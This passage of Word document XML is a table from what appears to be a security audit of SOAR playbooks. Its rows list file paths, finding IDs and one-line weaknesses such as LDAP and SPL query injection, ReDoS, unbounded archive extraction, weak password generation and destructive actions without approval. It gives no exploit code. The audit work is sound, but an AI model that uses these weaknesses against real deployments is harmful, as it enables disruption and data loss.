            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>install.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk apps, attack data and container images downloaded without integrity verification from mutable locations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AD_LDAP_Account_Locking.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AD_LDAP_Entity_Attribute_Lookup.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-04,PB1-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LDAP filters built from untrusted device and group values without escaping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08,PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fail-open verdict mapping typo; unescaped markdown notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/MS_Graph_for_Office_365_Message_Eviction.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker Message-ID drives tenant-wide mail deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/ServiceNow_Related_Tickets_Search.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Search term concatenated into a ServiceNow encoded query and URL parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/activedirectory_reset_password.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07,PB2-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Non-cryptographic password generator; cleartext password written to a comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/container_merge.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthorised close, merge and evidence on attacker-influenced container ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/container_update.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01,CF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mass-assignment via input_json with no key allow-list; filter-string injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/regex_extract_email.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Polynomial-backtracking regex over attacker e-mail text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/regex_filter_list.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-05,CF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Compiles user-supplied regex (ReDoS) and uses prefix-anchored matching for filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/custom_functions/zip_extract.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04,CF-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Extracts an attacker-supplied archive with no decompression caps or cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/hunting.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Raw IP address passed as the whole Splunk/Carbon Black query (hunting.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/internal_host_splunk_investigate_log4j.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/playbooks_list.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/regex_split.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-05,CF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ReDoS via user-supplied regex compiled in regex_filter_list and regex_split</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
